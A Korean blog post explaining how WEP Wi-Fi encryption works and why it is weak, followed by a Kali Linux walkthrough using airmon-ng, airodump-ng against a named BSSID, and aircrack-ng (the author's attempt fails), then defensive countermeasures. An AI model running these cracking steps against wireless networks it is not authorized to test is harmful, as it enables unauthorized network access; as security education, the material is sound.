Self-Improvement

WEP 비밀번호 크랙 본문

무선

WEP 비밀번호 크랙

JoGeun 2018. 10. 20. 14:23

*WEP 키 크래킹
무선랜의 취약점을 보완하기 위해 1999년 IEEE 802.11에서 WEP 암호화 방식을 표준안으로 확정했다. IEEE 802.11 표준에 규정돼 있는 WEP 암화화 방식은 IEEE 802.11b 프로토콜에서 적용되기 시작했으며, RC4 암호화 알고리즘을 사용한다40비트 길이의 WEP 기밀 키와 임의로 할당되는 24비트 IV(Initialization Vector)로 조합된 총 64비트의 키를 이용해 RC4 알고리즘을 통해 암호화하는 방식이다.

(암호화 방식)
- MAC 데이터 부분에 대한 CRC-32 계산 결과 값인 32비트 길이의 ICV(Integrity Check Value)를 얻어 페이로드의 끝에 추가한다.
- 24비트의 IV 값을 랜덤하게 생성한다.
- IV + WEP (64비트값을 RC4 알고리즘에 대입해 키 스트림을 생성한다.
- ICV 값이 추가된 평문과 RC4 알고리즘을 통과한 키 스트림을 XOR 연산한다.
- XOR 연산 결과 생성된 암호문 앞에 IV 값을 추가해 전송한다.
  
(복호화 방식)
- 평문으로 전달된 IV 값과 WEP 비밀 키를 조합해 키 스트림을 생성한다.
- 암호문과 키 스트림을 XOR 연산해 복호화하면 평문과 ICV 값을 획득할 수 있다.
- 복호화된 평문의 ICV 값과 복호화된 데이터에서 나온 ICV 값을 비교해서 동일 여부를 확인한 후 전송이 올바르게 되었는지 판단한다.
  
(WEP 취약점)
WEP 암호화 방식은 키 길이가 짧은 것이 취약점이 아니라IV 값의 노출과 반복 사용하는 RC4 알고리즘에 취약점이 있다.
WEP 암호화 방식은 비밀키와 임의로 선택된 IVS 값을 이용해 4개의 키를 생성하고 생성된 키 중 하나를 선택해 암호화할 때 사용한다이때 키스트림의 재사용이 발생한다24비트의 IV는 5000개의 패킷마다 IV 값이 반복될 가능성이 50% 이상 된다고 한다.
그래서 2003년 와이파이 Alliance에 의해 WPA 암호화 방식이 임시 표준으로 대체하게 되었다. WEP 암화화 방식은 무선랜이 보안상에 문제가 많다라는 편견을 심어준 대표적인 보안 프로토콜이다.

*실습
사전 준비 : kaliLinux, 무선랜

#iwconfig (무선 랜카드를 확인)

 


kaliLinux에서 인식이 되었다.

 

#airmon-ng start wlan0 (무선랜카드를 모니터 모드로 전환)
※주변의 흘러가는 패킷을 모두 모니터하는 것 

 


airmon-ng check kill명령어를 통해 작업에 방해?되는 프로세스를 제거한다.


#airmon-ng check kill

 


#airmon-ng (인터페이스를 확인한다)

 


#airodump-ng wlan0mon (공격할 무선 AP를 검색)

 

- 암호화 알고리즘이 WEP인 securityhacker3을 찾았으며 BSSID를 통해 크랙을 수행한다.

#airodump-ng -c 4 --bssid 90:9F:33:A9:3B:26 -w securityhacker wlan0mon
- 채널이 4이며 bssid가 90:9F:33:A9:3B:26  WEP 무선의 패킷을 securityhacker로 저장을한다

 


※WEP 패스워드 크랙을 위해 많은 패킷을 발생시켜야 한다. 
- WEP 64bit :  250,000개 이상의 IV 수집해야 하며, 20,000개 이상의 데이터가 수집이 필요
- WEP 128bit :  1,500,000개 이상의 IV 수집해야 하며, 50,000개 이상의 데이터가 수집이 필요


#file securitygacker-01.cap
- 패킷을 저장한 파일을 확인한다

 


#aircrack-ng -z securityhacker-01.cap

 

※필자는 패킷이 크랙을할 정도의 양이 안되어 실패를 하였다. (패킷이 충분하면 크랙되어 진다.)

*보안 대책
■ 사용자 제어 정책
- 무선 랜 사용과 관련된 조직의 보안 정책 개발
- 무선 랜 사용자에 대한 보안 교육
- 건물과 무선 랜 장비 사용 장소에 대한 물리적인 접근 제어
- 집단 내에 보유한 무선 랜 장비의 목록 작성/관리
- WEP 암호화 사용 금지
  
■ AP 제어 정책
- 무선 랜카드와 AP의 보안 패치 적용
- AP 송신 파워 조절
- AP 설치시 외부와 인접한 장소(창문 등회피
- AP 설치시 외부에 신호가 노출되지 않게 주변 벽 재질을 RF 감쇠율이 높은 금속으로 사용
- 미 사용 AP 전원 차단
- AP의 Beacon 패킷(SSID 브로드캐스트기능 차단
- AP의 SSID 설정시 부서명회사명제품명 등의 사용 금지
- MAC 필터링을 이용해서 인가된 사용자만 접근 허용
  
■ IDPS 제어
- WIDPS 관리자, WIDPS 센서 설치 후 관제와 침입 차단